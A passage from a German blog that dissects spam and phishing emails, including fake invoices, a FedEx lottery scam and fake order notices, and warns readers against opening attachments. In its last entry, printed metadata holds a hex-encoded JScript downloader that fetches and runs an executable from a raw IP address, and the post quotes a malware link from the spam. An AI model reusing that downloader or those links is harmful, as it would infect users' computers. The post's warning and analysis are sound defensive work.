Unser täglich Spam

Aus dem Internet frisch auf den Tisch. Köstlich und aromatisch.


Schlagwortarchiv „Sehr geehrter Kunde“

Rechnung zur Bestellung vom 08.10.2016 Nr. 551337926

Samstag, 8. Oktober 2016

Schön, dass die Bestellung ein Datum und eine Nummer hat.

Sehr geehrter Kunde,

Schön, dass ich so einen schönen Namen habe. Der klingt fast so persönlich wie eine Nummer.

leider mussten wir gerade feststellen, dass die Zahlungsaufforderung NR551337926 bis jetzt ergebnislos blieb. Jetzt gewähren wir Ihnen damit letztmalig die Chance, den ausbleibenden Betrag der Firma Online24 Pay GmbH zu begleichen.

Schön, dass die Nummer der Zahlungsaufforderung wiederholt wird. Diesmal ist es sogar die gleiche Nummer wie im Betreff. Das kriegen Spammer nicht immer hin. Ein „Wir“, das sich nicht näher vorstellt und kalt wie eine Wand ist, erinnert an die SPD im letzten Bundestagswahlkampf und gibt mir eine allerletzte Chance, Geld an eine Unternehmung zu bezahlen, mit der ich es noch niemals zu tun hatte. Wofür? Wieviel? Bis wann? Auf welches Konto? Das sind lauter Angaben, die im Text dieser Spam nicht halb so wichtig wie die Nummer der Bestellung sind.

Schließlich will dieser Spammer nicht das Geld seiner Opfer. Auch, wenn er…

Aufgrund des andauernden Zahlungsausstands sind Sie gezwungen dabei, die durch unsere Tätigkeit entstandene Gebühren von 65,38 Euro zu tragen. Bei Rückfragen oder Unklarheiten erwarten wir eine Kontaktaufnahme innerhalb von drei Werktagen. Um weitete Kosten auszuschließen, bitten wir Sie den ausstehenden Betrag auf unser Bankkonto zu überweisen. Berücksichtigt wurden alle Buchungseingänge bis zum 07.10.2016.

…ständig im ungeübten Technokratentone vom Gelde spricht und sogar Fantasiegebühren verlangt und zu einer Kontaktaufnahme auffordert, ohne auch nur eine verdammte Adresse, eine Mailadresse oder eine Telefonnummer für die Kontaktaufnahme zu nennen. Das ist alles nur dafür da, den Empfänger dieser Spam einzuschüchtern und zu verängstigen, denn der Spammer weiß als erfahrener Verbrecher ganz genau, dass Angst dumm macht. Und wer dumm und ängstlich ist, der klickt halt gut…

Die gesamte Überweisung erwarten wir bis spätestens 14.10.2016. Falls wir bis zum genannten Termin keine Zahlung bestätigen, sehen wir uns gezwungen unsere Forderung an ein Gericht abzugeben. Alle damit verbundenen Zusatzkosten gehen zu Ihrer Last.

Eine Wendung wie „sehen wir uns gezwungen unsere Forderung an ein Gericht abzugeben“ kann nur jemand tippen, der keine Ahnung vom gerichtlichen Mahnverfahren hat. Dafür fehlt so eine Angabe wie die Kontonummer, auf die man bis zum 14. Oktober überweisen soll – wer immer wirklich Geld haben wollte, würde diese Kontonummer ganz sicher angeben. (Übrigens würde auch jeder in der deutschen Sprache leidlich geübte Schreiber bei einer Fristsetzung den Monat als Wort ausschreiben, damit Missverständnisse beim Empfänger völlig ausgeschlossen sind.) Dieser kriminelle Spammer will kein Geld, er will nur…

Eine vollständige Forderungsausstellung Nr. 551337926, der Sie alle Buchungen entnehmen können, befindet sich im Anhang.

…dass man den Anhang aufmache.

Ein bisschen mehr zu diesem Anhang kommt in Kürze.

Mit verbindlichen Grüßen

Rechnungsstelle Marco Cock

Das heißt aber „unter Erbietung meiner vorzüglichsten Hochachtung verbleibe ich als ihr ergebener Marco Cock“. :mrgreen:

Diese E-Mail enthält vertrauliche und rechtlich geschützte Informationen. Wenn Sie nicht der richtige Adressat sind und diese E-Mail irrtümlich erhalten haben, informieren Sie bitte sofort den Absender und vernichten Sie diese E-Mail. Das Kopieren von Inhalten dieser E-Mail und die Weitergabe ohne Genehmigung ist nicht erlaubt und stellt eine Urheberrechtsverletzung dar.

Diese unverschlüsselte und nicht digital signierte Spam ist offen wie eine Postkarte durch das Internet befördert worden und konnte auf ihrem Weg von jedem mitgelesen oder sogar verändert werden. Wer behauptet, dass sie ganz geheime Geheimgeheimnisse enthält, dokumentiert damit seine technische Ahnungslosigkeit und seine lebenspraktische Dummheit. Wer ein Urheberrecht auf den Text einer E-Mail beansprucht, dokumentiert damit ebenfalls etwas für einen zivilisierten Menschen äußerst Unvorteilhaftes. Das tun allerdings nicht nur dumme Spammer; so einen vor Blödheit quietschenden Bullshit habe ich auch schon in E-Mail von Unternehmen gesehen, die gar nicht so lächerlich wie derartige Proklamationen in der gewerblichen Kommunikation sind. Wer mag, kann ja gern mal versuchen, vor Gericht sein „Urheberrecht“ gegen mich durchzusetzen und dabei einem möglicherweise erheitertem Gerichte gegenüber darlegen, dass es sich bei seiner Mail um ein Werk mit der dazu erforderlichen, schützenswerten Schöpfungshöhe handele, wenn ich eine seiner Mails zitiere. Ein kleiner Tipp von mir als Nichtjuristen, der natürlich keine Rechtsberatung geben darf und für eine Rechtsberatung auf einen richtigen Rechtsanwalt verweisen muss: Eine Bezugnahme aufs Fernmeldegeheimnis halte ich für wesentlich erfolgversprechender, wenn man es schon nötig hat, solche Veröffentlichungen juristisch zu unterdrücken. ;)

So, jetzt aber wieder zur Sache, nämlich…

Zum Anhang

An die Spam ist ein ZIP-Archiv mit dem Dateinamen 08.10.2016.zip angehängt, morgen wird es vermutlich das Datum von morgen werden. Dieses ZIP-Archiv ist in meinem Exemplar der Spam kaputt (es hat eine Dateigröße von null Bytes) und deshalb kann ich es nicht näher untersuchen – ich gehe aber davon aus, dass es in anderen Fällen, in denen das Spamskript funktioniert hat¹, wie üblich eine ausführbare Datei für Microsoft Windows sein wird. Typischerweise wird auf diese Weise sehr aktuelle Schadsoftware zugestellt, die von den Antivirus-Programmen noch nicht erkannt werden kann. Antivirus-Programme können nämlich nur Schadsoftware erkennen, die bei den Herstellern der Antivirus-Programme bereits bekannt ist und sind generell von eher zweifelhaftem Nutzen.

Es handelt sich keineswegs um ein Dokument, aus dem irgend etwas hervorgeht. Es handelt sich um ein Windows-Programm, das von einem Verbrecher mit einer irreführend formulierten, vorsätzlich einschüchternden Spam zugestellt wurde. Die Verpackung in einem ZIP-Archiv hat nur den Zweck, Antivirus-Programmen auf einem Mailserver die Analyse zu erschweren², denn der Spammer lebt davon, dass seine kriminellen Spams ankommen. Wer eingeschüchtert ist, Microsoft Windows verwendet und angstvoll klicke-di-klick den Anhang öffnet, hat danach einen Computer anderer Leute auf seinem Schreibtisch stehen. Und diese Leute wären besser mit Handschellen und vergitterten Fenstern bedient!

Es ist immer verantwortungslos, dumm und gefährlich, Mailanhänge in E-Mails von Unbekannten zu öffnen. Bitte, lasst es einfach sein! Und öffnet auch bei scheinbar bekannten Absendern keine Mailanhänge, die nicht vorher explizit und über einen anderen Kanal als E-Mail abgesprochen wurden, denn der Absender einer E-Mail kann beliebig gefälscht werden! Im Zweifelsfall ist auch dann noch die Zeit für ein kurzes Telefonat, wenn es einmal sehr eilig ist…

Diese kleine Vorsicht ist bei E-Mail wirksamer als jedes so genannte Antivirus-Programm.

¹Typischerweise sind die Anhänge von Schadsoftware-Spams nicht identisch, um eine leichte Erkennung und Ausfilterung des gefährlichen Mülls unmöglich zu machen. Diese Schadsoftware-Spammer leben nun einmal davon, dass ihre Mails auch ankommen. Natürlich werden diese „unterschiedlichen“ Anhänge mit einem Skript erzeugt, und natürlich machen auch die Spammer immer wieder einmal Fehler beim Programmieren. Deshalb kommt es zu solchen „verunglückten“ Anhängen. Nach meinen Erfahrungen ist im Durchschnitt rd. jede dreißigste Mail mit Schadsoftware wegen eines Programmierfehlers der Spammer unwirksam, in letzter Zeit „bessert“ sich das jedoch.

²Natürlich ist es möglich, beim Antivirus-Scan auf einem Mailserver auch ZIP-Archive auszupacken. Das wird aber meist nicht getan, damit der Mailserver nicht von kecken Angreifern mit einer recht einfach zu bauenden ZIP-Bombe lahmgelegt werden kann. Generell kann und sollte man einen ZIP-komprimierten Mailanhang als Indiz dafür betrachten, dass in der Mail Schadsoftware transportiert werden soll.

FedEx-Team

Sonntag, 2. Oktober 2016

Von: FedEx Paket Zustellbenachrichtigung <fedex (punkt) online (strich) team (at) outlook (punkt) com>

Das muss ja von FedEx sein! Steht ja in der Mailadresse! :mrgreen:

(Wer den Witz nicht versteht: Als Absender ist eine kostenlos und anonym einzurichtende Mailadresse bei Microsofts Freemail-Dienst eingetragen, die sich jeder holen könnte. Das echte FedEx würde selbstverständlich Mailadressen aus seiner eigenen Domain fedex (punkt) com verwenden. Tatsächlich reicht schon dieser Absender, um die Mail als Spam in die Mülltonne zu tun; es ist nicht mehr erforderlich, sie noch zu lesen. Aber dafür gibts beim Lesen viel Zwerchfellmassage. Die Zeilenumbrüche sind original.)

Dies ist zuverlässig und wichtige Informationen

Gut, dass mir das so deutlich gesagt wird! :mrgreen:

Und jetzt kommt zertifiziertes Qualitätsdeutsch eines „Unternehmens“, das offenbar kein Geld für einen Dolmetscher übrig hat:

Sehr geehrter Kunde!!

Sie haben ein FedEx-Paket am Mittwoch, den 7. März 2016 Zeit 13.16
FedEx Kurier bietet Ihnen die Schweiz-USA

Wir haben für Ihre Nachricht warten.
Wir bestätigen, dass Ihr Paket mit uns für den Versand zu Ihrem Wohnstandort [sic!] registriert.
Wir dachten, dass der Absender Sie unsere Kontaktdaten gab.

Wir möchten, dass Sie wissen, dass es ein Brief ist auch an Ihrem
Paket.

Wir können jedoch nur wenig verraten über den Inhalt, Datenschutz, E-Mail nur

Diese E-Mail bedeutet, dass unsere Lieferung Team Lieferung zu Ihnen nach Hause
schließlich gestoppt hat.

Ihr Paket ist in unserem Büro in Detroit Michigan, USA.

Das Paket von FedEx wurde von Herrn John „Jack“ Long, der eine Power Ball Lotterie am 19. Juli 2014 in Kalifornien hat, gesendet. [sic! Die kennen nicht einmal den Namen des Paketempfängers, aber wissen, dass der angegebene Absender schon einmal in einer Lotterie gewonnen hat.]
Sie wurden per E-Mail als einer der Gewinner gewählt Ihrer Familie und Ihrem Land zu helfen.

Grund für sein Angebot

Er sagte auch, in seinem Dokument, dass er dieses Angebot gibt, weil er alt ist und er hatte keine andere Wahl, als die Welt zu helfen.

John „Jack“ lang, geschrieben throgh FedEx in Ihrem Namen.

Sie können John „Jack“ Lange auf Google sehen Sie seine Kommentare sorgfältig lesen

http://www.calottery.com/win/winner%20stories/john%20jack%20long

Wir verstehen, dass der Inhalt der Verpackung selbst ist eine Bank Draft von $800,000.00 USD in EUR €738,474.036 wir haben.

In FedEx Sie verschieben wir Geld nicht in bar, sondern in der Bank Scheck [sic!]

Beachten Sie, dass wir nicht akzeptieren, per E-Mail zu kontaktieren, aber aufgrund der hohen Priorität des Pakets hatten wir Sie informieren [sic!].

Wir entsiegelt persönlich Ihre Bank Draft [sic!] und wir fanden, Ihre E-Mail-Kontakt in dem beigefügten Schreiben als Empfänger des vordersten Pakets [sic! Kein Wunder, dass die Pakete nicht bei mir ankommen, wenn nur eine Mailadresse draufsteht].

Das Paket wurde von Ihren Kollegen registriert hier und Ihr Kollege erklärte, dass er aus Vereinigten Staaten

Wir möchten Sie kein dass Ihr Paket auf einem Sonderauftrag registriert wurde.

Ihre Kollegen haben bereits für alles bezahlen, das Paket zu Ihnen nach Hause zu schicken.

Alles, was Sie ist die Sicherheitsgebühr von nur $410 USA zahlen müssen.

GRÜNDE DAFÜR
Der Grund für die Zahlung ist, dass Ihre Spender nie neu, wie lange es dauern wird, Sie, uns zu kontaktieren, dann wir die Sicherheitsgebühren von ihm ablehnen. [Häh?]

Dies ist notwendig, um Ihre Postanschrift und Telefonnummern zu bestätigen erforderlich.[sic!]

Vollständiger Name:
TELEFON:
ADRESSE:
LAGE: [sic!]
BUNDESLAND:
LAND:

Sie können unsere Hotline unter +12708xxxxxx Hilfe rufen
Freundliche Grüße,
Mr. Aleobua Gertrude.
FedEx Online Team Management.
Kopieren © 2016 [sic!]

Ohne Worte.

(Ich glaube nicht, dass darauf jemand reinfallen kann.)

Ihre Bestellung ist auf dem Weg zu Ihnen! OrderID 0293126

Mittwoch, 21. September 2016

Achtung: Auf keinen Fall den Anhang öffnen! Es handelt sich um aktuelle und sehr gefährliche Schadsoftware, die von vielen Antivirusprogrammen zurzeit noch nicht erkannt wird. Generell sollten E-Mail-Anhänge immer mit äußerster Vorsicht behandelt werden, nicht nur, wenn jemand vor einer bestimmten E-Mail warnt.

Die Nummer nach OrderID im Betreff variiert natürlich.

Von: Kids Party World <service (at) kids (strich) party (strich) world (punkt) de>

Der Absender ist (wie beinahe immer in der Spam) eine Fälschung. Mein Exemplar dieser Spam wurde über die dynamisch vergebene IP-Adresse eines iranischen Telekommunikationsanbieters – also vermutlich über einen mit Schadsoftware übernommenen und in einem Botnetz missbrauchten iranischen Privatrechner – versendet. Die Spam hat niemals den im Absender angegebenen Server gesehen. Für den Menschen, dessen Rechner zurzeit von Kriminellen missbraucht wird, kann ich nur hoffen, dass die iranische Justiz in Internetdingen kompetenter ist als die deutsche, denn die in der Islamischen Republik Iran von Richtern ausgesprochenen Strafmaße sind wahrlich nicht von schlechten Eltern!

Sehr geehrter Kunde,

Ich will aber meine Kundennummer! Sonst ist mir das viel zu unpersönlich! :mrgreen:

Ihre Bestellung wurde am 21.09.2016 auf den Weg gebracht, bzw. von Ihnen bei uns im Lager abgeholt.

Welche Bestellung? Welche Vorgangsnummer? Von wann? Was wurde bestellt? Und was heißt hier „auf den Weg gebracht“? Habt ihr den Plunder vor eure Tür gestellt? :mrgreen:

Wie immer in der Schadsoftware-Spam steht im Text der Mail objektiv nichts, denn man soll ja einen Anhang aufmachen, um zu erfahren, um was es überhaupt geht.

Versanddienstleister für Standard Paketsendungen [sic!] ist die Firma DHL – für die Express Lieferungen [sic!] DHL-Express.

Blah! Für den Versand von Deppen Leer Zeichen ist DHL zuständig.

Eine Lieferadresse wäre doch auch mal interessant. Aber nein, man soll ja den Anhang aufmachen, und so steht eben nichts im Text der Spam.

Sollte Ihre Bestellung nicht in den nächsten 1-3 Werktagen (Mo – Sa) bei Ihnen eintreffen, dann wenden Sie sich bitte per eMail an uns.
Auslandsendungen innerhalb der EU, bzw. europ. Nachbarländer benötigen 2-5 Werktage (Mo – Fr).

EXPRESS Sendungen [sic!] werden grundsätzlich am nächsten Werktag bis 12.00 Uhr ausgeliefert. Express Samstags Sendungen [sic!] am folgenden Samstag bis 12.00 Uhr!

Blah. Aus einer anderen Quelle bezugslos in die Spam kopierter, völlig nichtssagender und nicht informativer Text, der zudem sehr peinliche Deppen Leer Zeichen der Marke „Express Samstags Sendungen“ enthält.

Einzelheiten der Lieferung können Sie über den folgenden Link einsehen:

http://nolp.dhl.de/nextt-online-public/set_identcodes.do?lang=de&idc=05841224279920

Ja, schon klar! Einfach eine Tracking-Nummer nehmen, die es gar nicht gibt, so dass man völlig legitim auf DHL verlinken kann und der Empfänger den Hinweis sieht, dass zu dieser Sendung gar keine Informationen vorliegen. Toller Trick! Allerdings stünde dort etwas anderes, wenn die Sendung „auf den Weg gebracht“ worden wäre…

Die DHL Tracking Nr. lautet:

05841224279920

Oh, wie nett! So muss ich sie nicht aus dem URI lesen. Das hat mich jetzt zwar nicht überfordert, aber immerhin sieht so der Text der Spam nach etwas mehr aus, ohne das etwas Inhaltliches mitgeteilt wurde. Könnt ihr Absender mir jetzt bitte mal sagen, was in dem Paket überhaupt drin ist?! Ach, um das zu erfahren, soll ich den Anhang mit eurer frischen Schadsoftware öffnen, schon klar…

Dass dieses Mailpapier aber auch immer so begrenzt ist! :mrgreen:

Bitte beachten Sie bei der Paketannahme den Zustand des Pakets. Wenn eine Beschädigung des Pakets vorliegt, bitten wir Sie diese von dem Zusteller aufnehmen zu lassen. Nur dann kann die Versandversicherung im Falle einer Beschädigung der Waren in Anspruch genommen werden.

Blah. Auch dieser Text wurde von irgendwo in die Spam kopiert und enthält keine für den Empfänger relevante Information. Immerhin wird mir diesmal eine „Paket Annahme“ und eine „Versand Versicherung“ erspart; es scheint sich um eine andere Quelle zu handeln. :D

(Was wärt ihr nur ohne eure Zwischenablage, Spammer! Da müsstet ihr euch ja mühsam selbst die Texte ausdenken. Das passte so etwas von gar nicht zu euch. Denn wenn ihr euch Mühe geben wolltet, dann könntet ihr ja gleich arbeiten gehen…)

Eine Rechnungskopie zu Ihrer Information haben wir dieser eMail beigefügt.

Nicht einmal der Rechnungsbetrag wird erwähnt, auch keine Bankverbindung und nichts. Um überhaupt irgendetwas zu erfahren, muss man den Anhang öffnen, denn in der Spam steht nur bedeutungsleerer Blah. Genau das – dass man von vorgeblichen Zahlungsverpflichtungen aufgescheucht möglichst unter Umgehung des Gehirnes den Anhang öffne – ist nämlich das einzige Ziel der Spammer. Die haben diese Spam ja nicht aus dem Grund geschrieben, aus dem man normalerweise Mail schreibt: Um etwas mitzuteilen.

Vielen Dank für Ihren Einkauf in unserem Online Shop [sic!]

Vielen Dank für euer Deppen Leer Zeichen, das immer ein Zeichen leerer Deppen ist.

Wir freuen uns auf einen weiteren Besuch von Ihnen!

Aber ich war nie bei euch…

Mit freundlichen Grüßen,

Ihr Kids Party World Team

Kids Party World
Senefelder Str. 2
63110 Rodgau

Tel.: 06106/266xxxx
UstID: DE235212299

Die Kürzung der Telefonnummer ist von mir. Die in der Spam angegebene Telefonnummer gehört wirklich zu „Kids Party World“. Wer immer gerade an diesem Telefon sitzt, tut mir leid. Dem Spammer ist es natürlich egal, was er anrichtet; dem reicht es, wenn sein kriminelles Geschäft läuft. Egal, ob Menschen bis an den Rand des Nervenzusammenbruches terrorisiert werden oder ob die Reputation von Unternehmungen mit dem Missbrauch der Firmierung durch den Dreck gezogen wird. Spammer sind nun einmal asoziale Kriminelle, die für ein paar Groschen alles kaputt machen würden. Wenn es diese Widerlinge nicht gäbe, würde vermutlich nur die Mutter etwas vermissen. Und nicht einmal das ist sicher…

besuchen Sie uns auch auf Facebook:
https://www.facebook.com/kids.party.world.shopping

Wer mich dazu auffordert, die Website einer stinkenden Spamsau wie Facebook zu besuchen, braucht nicht damit zu rechnen, dass ich mit ihm jemals ins Geschäft kommen werde. Ganz im Gegenteil. Ich hasse nämlich Spam. Und Leute, die einen asozialen Spammer so offen unterstützen, sind die Spam.

Der Anhang

Der Anhang der Mail ist ein ZIP-Archiv…

$ unzip -l invoice_912408.zip 
Archive:  invoice_912408.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
    33676  2016-09-21 12:49   IHPHICX18402.wsf
---------                     -------
    33676                     1 file
$ _

…das eine einzige Datei enthält. Die Dateinamenserweiterung .wsf ist eine Abk., die ausgeschrieben „Windows Script File“ bedeutet. Es handelt sich nicht um ein Dokument, sondern um eine ausführbare Datei für Microsoft Windows; um ein Programm, das von einem Spammer mit einer irreführend formulierten Mail zugestellt wurde. Das Programm ist vorsätzlich kryptisch formuliert, um eine Analyse durch Antivirus-Schlangenöl und menschliche Experten zu erschweren.

Es handelt sich zweifelsfrei um Schadsoftware.

Wer das ZIP-Archiv auspackt und die Datei unter Microsoft Windows doppelklickt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen.

Diese klare Schadsoftware wird zurzeit von rd. 85 Prozent der gängigen Antivirus-Schlangenöle nicht als Schadsoftware erkannt. Antivirus-Programme können immer nur Schadsoftware erkennen, die bei den Herstellern der Antivirus-Programme bereits bekannt ist. Sie versagen grundsätzlich bei aktueller Schadsoftware, wie man sie oft in derartigen Spammails zugestellt bekommt.

Deshalb ist es wichtig, dass man derartige Versuche selbst erkennt. Hinweise dazu (die Mail ist objektiv inhaltsleer, alles Wichtige steht erst im Anhang – das sind typische rhetorische Tricks in der Schadsoftware-Spam) habe ich hier und an vielen anderen Stellen gegeben. Grundsätzlich sollte niemals ein Anhang aus einer E-Mail geöffnet werden, wenn die Zustellung der Datei nicht über einen anderen Kanal als E-Mail explizit vereinbart wurde¹; und ein Anhang aus der Mail eines Unbekannten verbietet sich völlig. Es ist übrigens niemals so eilig, dass man nicht vor dem Öffnen telefonisch (oder via IM) rückfragen kann, ob die Mail echt ist.

Aber bitte nicht bei derartigen Spams rückrufen! Dass es sich hier um Spam handelt, lässt sich nämlich leicht an anderen Merkmalen erkennen. Die armen Seelen dort bei „Kids Party World“ am Telefon! :(

¹Warum ein anderer Kanal? Um sicher sein zu können, dass der Absender echt ist. Der Absender eine E-Mail kann kinderleicht und beliebig gefälscht werden. Deshalb sollte meiner Meinung nach jeder Mensch und jedes Unternehmen (insbesondere Banken) digital signierte E-Mail verwenden, um jenseits jedes vernünftigen Zweifels sicherstellen zu können, dass der Absender im Besitz eines bestimmten privaten Schlüssels ist. Das ist relativ einfach und kostet kein Geld, bringt aber viel für die Computersicherheit und gegen die Organisierte Kriminalität im Internet. Ich rede allerdings in diesem Punkt seit zwei verdammten Jahrzehnten gegen Wände aus betonhafter Dummheit.

Domainregistrierung 2016 / 2017

Mittwoch, 14. September 2016

Bitte auf gar keinen Fall auf diese Spam reinfallen! Sie wird von Spamfiltern (noch) nicht sicher als Spam erkannt.

Von: .DE Deutsche Domain <info31 (at) deutschewebhost (punkt) com>
An: .DE Deutsche Domain <info31 (at) deutschewebhost (punkt) com>

Die Spam ist nicht an den Mailempfänger adressiert, sondern der Empfänger steht unsichtbar im BCC:-Header. Das bedeutet, dass diese Mail an mehrere Empfänger gegangen ist, und es passt gar nicht dazu, dass einer Einzelperson für eine Dienstleistung eine Rechnung zugestellt wurde.

Die Domains in der TLD .de werden übrigens nicht von einer obskuren „DE Deutsche Domain“ verwaltet, sondern von der DENIC eG. Spätestens jetzt ist klar, dass es sich um eine illegale und asoziale Spam handelt, die einfach in die virtuelle Mülltonne geworfen werden kann.

Sehr geehrte Frau / Herr,

Unternehmen, mit denen man einen Vertrag hat, sprechen ihre Kunden namentlich an.

Nachfolgend die Einzelheiten zu der Domainregistrierung für 2016 / 2017.

Für welche Domain? Ich verwalte mehrere. (Und nein, das ist keineswegs ungewöhnlich, sondern ein sehr häufiger Fall.)

Aber wenn der Spammer in seine Spam eine Domain wie tamagothi.de reinschreibt, dann wird sogar noch den naivsten Empfängern seines dummen Textes sofort klar, dass es nichts mit ihnen zu tun hat, dass es vermutlich Spam ist und dass sie die Spam einfach löschen können. Deshalb muss der Spammer – wenn er nicht weitere Daten zu seinem Opfer hat, mit denen er etwas Eindruck von Vertragsverhältnis schindet – anonym formulieren.

Wir hoffen, Sie ausreichend informiert zu haben.

Es soll ja Menschen geben, die sich einfach klar ausdrücken und nicht mehr zu hoffen brauchen, dass es ausreicht. :mrgreen:

Mit freundlichen Grüssen

Der – zugegebenermaßen recht entbehrliche – Buchstabe „ß“ fand sich wohl nicht auf der „deutschen“ Tastatur dieses Spammers.

Birgit Hoffmann

Kundendienst
DE Deutsche Domain
info@deutschedomain.com

Nach diesem grandiosen Abschluss ist gar nichts klar oder ausreichend. Insbesondere weiß niemand, um was zum hackenden Henker es hier eigentlich geht. An der Mail hängt noch ein Anhang, auf den in der Mail kein Bezug genommen wurde; es handelt sich um…

$ ls -lh Rechnung\ 232417.pdf 
-rw-rw-r-- 1 elias elias 1,4M Sep 14 11:29 Rechnung 232417.pdf
$ file Rechnung\ 232417.pdf 
Rechnung 232417.pdf: PDF document, version 1.5
$ _

…ein 1,4 MiB großes PDF-Dokument, das mit seinem Dateinamen den Eindruck erweckt, eine Rechnung zu sein.

Da es sich um eine Spam handelt, kann ich nur strikt davon abraten, das PDF in einem normalen PDF-Viewer oder gar in Adobes Acrobat zu öffnen. PDF-Dokumente können Javascript und eingebettete Inhalte (wie etwa Flash- oder Java-Applets) enthalten, die bei der Darstellung ausgeführt werden, und der Acrobat hat eine erhebliche Sicherheitsgeschichte. Auch, wenn zurzeit kein einziges Antivirus-Schlangenöl in diesem Dokument eine Schadsoftware erkennt, ist es gefährlich, eine solche Datei aus einer Spam zu öffnen.

Eine einfache (aber auch nicht völlig gefahrlose) Möglichkeit, sich das PDF trotzdem anzuschauen, ist es, das PDF in ein Grafikprogramm wie Gimp zu importieren. Dabei werden nur die sichtbaren Bereiche des Dokumentes in ein Bild umgewandelt, es kommt nicht zur Ausführung von eventuell enthaltenem Code. Warum das immer noch ein bisschen gefährlich ist? Nun, die Bibliotheken, mit denen PDFs geparst und in eine Grafik gezeichnet werden, könnten einen frisch gefundenen und noch unbehobenen Fehler enthalten, der von Kriminellen ausgebeutet wird. Wer ganz sicher gehen will, verwendet eine Betriebssysteminstallation in einer virtuellen Maschine.

Nachdem ich so wortreich klar gemacht habe, dass Spam gefährlich ist, ist die Zeit für den Anhang gekommen:

So sieht der Mailanhang aus

„Zahlen sie völlig grundlos an eine Unternehmung, mit der sie keinerlei Vertrag haben und die nicht einmal ihren Namen als Rechnungsempfänger einträgt, 195 Euro, und zwar binnen 14 Tagen“. Die Spammer gehen offenbar davon aus, dass von den mutmaßlich mehrere Millionen Empfängern mindestens ein Promille so dumm sein wird, auf diese Masche reinzufallen – und das wären schon mehrere tausend. Wenn es nur dreitausend sind, so kommt auf dem Konto mit der angegebenen IBAN in den nächsten Tagen mehr als eine halbe Million Euro an – Geld, das sicherlich nicht lange auf diesem Konto liegen bleibt, sondern von einem über Spam angeworbenen „Finanztransferagenten“ schnell abgeholt und weiterbefördert wird, um schließlich von anonym bleibenden Verbrechern für Koks und Nutten verprasst zu werden.

Man kann wirklich etwas Besseres mit den 195 Euro anfangen. Fallen Sie nicht auf diese Spam herein, und sagen Sie anderen Menschen weiter, was es mit dieser Spam auf sich hat! Von den gesparten rd. zweihundert Euro können Sie mir ja zwei Euro spenden, die ich dann für Lakritz, Kaffee, Kuchen, Zigaretten und Domainkosten verprassen werde… ;)

Diese Spam ist ein Zustecksel meines Lesers A.H. Danke!

Info von ihre Bank

Freitag, 12. August 2016

Ja, ich weiß, Spammer: Flektierende Sprachen sind wirklich schwierig zu beherrschen. Übung könnte einen Meister machen. Aber nicht bei dir, denn du willst ja nur spammen.

Sehr geehrter Kunde!

Diese Mail eines unbekannten Absenders beginnt mit der Behauptung, dass man dort „Kunde“ sei, aber der Name des „Kunden“ ist beim Absender offenbar nicht bekannt. Über diese Kleinigkeit geht er hinweg, indem er behauptet…

Ihre Bank hat die Lastschrift zuruck buchen lassen. Sie haben eine ungedeckte Rechnung bei HSH Nordbank.
Bitte laden Sie die Datei aus dem Link:
http://www.1800cloud.com/infos/report.doc

…dass man eine unbeglichene Rechnung hat, weil ein Bankkonto mit einer ungenannten Kontonummer nicht gedeckt war. Eine Rechnung für irgendwas. Bei irgendwem. Über irgendeinen Betrag. Von irgendwann. Irgendetwas Näheres zur angeblichen Sache kann man nur erfahren, wenn man ein Word-Dokument öffnet, das in der anonym formulierten E-Mail eines Unbekannten verlinkt wurde.

Wenn man das nicht sofort und möglichst hirnlos tut…

Aufgrund des andauernden Zahlungsruckstands sind Sie verpflichtet auberdem [sic!], die durch unsere Beauftragung entstandenen Kosten von 19,67 Euro zu bezahlen. Wir erwarten die Zahlung bis spatestens 17.08.2016 auf unser Konto. Namens und in Vollmacht unseren Mandanten fordern wir Sie auf, die offene Forderung sofort zu begleichen.

Bitte beachten Sie, dass keine weitere Mahnung erfolgt. Nach Ablauf der festgelegten Frist wird die Angelegenheit dem Staatsanwalt und der Schufa ubergeben. Die vollstandige Forderungsausstellung, der Sie alle Positionen entnehmen konnen, fugen wir bei. Fur Ruckfragen oder Anregungen erwarten wir eine Kontaktaufnahme innerhalb des selben Zeitraums.

…geht es gleich zu Staatsanwalt und Schufa, statt ganz normal beim zuständigen Mahngericht einen Mahnbescheid zu beantragen. Der Spammer weiß ja genau, dass Angst dumm macht – und man muss schon ein bisschen dumm sein, um eine Datei zu öffnen, die einem mit Spam zugestellt wurde.

Leben Sie wohl!

Geh sterben, Spammer!

Die angehängte Datei ist…

$ file report.doc | sed 's/, /\n/g'
report.doc: Composite Document File V2 Document
Little Endian
Os: Windows
Version 6.1
Code page: 1251
Title:  
Subject: b
Author: c
Keywords: g
Comments: 66756e6374696f6e20737461727428297b7472797b76617220783d6e657720416374697665584f626a65637428226d73786d6c322e786d6c6874747022293b76617220663d6e657720416374697665584f626a6563742822736372697074696e672e66696c6573797374656d6f626a65637422293b76617220773d6e657720416374697665584f626a6563742822777363726970742e7368656c6c22293b76617220613d6e657720416374697665584f626a656374282261646f64622e73747265616d22293b76617220703d772e457870616e64456e7669726f6e6d656e74537472696e6773282225746d702522292b225c5c33313230392e657865223b782e6f70656e2822474554222c22687474703a2f2f38382e3131392e3137392e3136302f316269796375686f7165747a6f776161776e6561622e657865222c66616c7365293b782e73656e6428293b696628782e737461747573203d3d20323030297b696628662e66696c65657869737473287029297b662e64656c65746566696c652870293b7d612e6f70656e28293b612e747970653d313b612e777269746528782e726573706f6e7365626f6479293b612e73617665746f66696c652870293b612e636c6f736528293b772e72756e28702c312c30293b7d7d63617463682865297b7d7d
Template: Normal.dot
Last Saved By: admin
Revision Number: 2
Name of Creating Application: Microsoft Office Word
Create Time/Date: Sat Aug  6 17:17:00 2016
Last Saved Time/Date: Sat Aug  6 17:17:00 2016
Number of Pages: 1
Number of Words: 23
Number of Characters: 116
Security: 0
$ _

…ein in null Sekunden erstelltes Dokument für Microsoft Word, das 23 Wörter auf einer Seite enthält. Wer es öffnet und trotz der Warnung die Ausführung von Makros in Word zulässt, hat hinterher einen Computer anderer Leute auf dem Schreibtisch stehen. Damit man auch wirklich so dumm ist, trotz der Warnung den Programmcode von Spammer ausführen zu lassen, steht ein Hinweis im Dokument:

Attention! This document was created in a newer version of Microsoft Office. To display the contents of the document need to enable macros

Kurz und schnell gesagt: Es handelt sich um Schadsoftware. Natürlich ist es wieder einmal die frischeste Brut der Kriminellen, und deshalb wird der verbrecherische Müll (der vermutlich einen Erpressungstrojaner aus dem Internet nachlädt) zurzeit nur von einer Minderheit der gängigen Antivirus-Schlangenöle erkannt. Wer sich auf sein Antivirus-Programm verlassen hat, ist also wieder einmal verlassen.

Deshalb ist es so wichtig, niemals auf derartige Spam hereinzufallen, sondern sie zu erkennen. Das ist in diesem Fall relativ einfach gewesen:

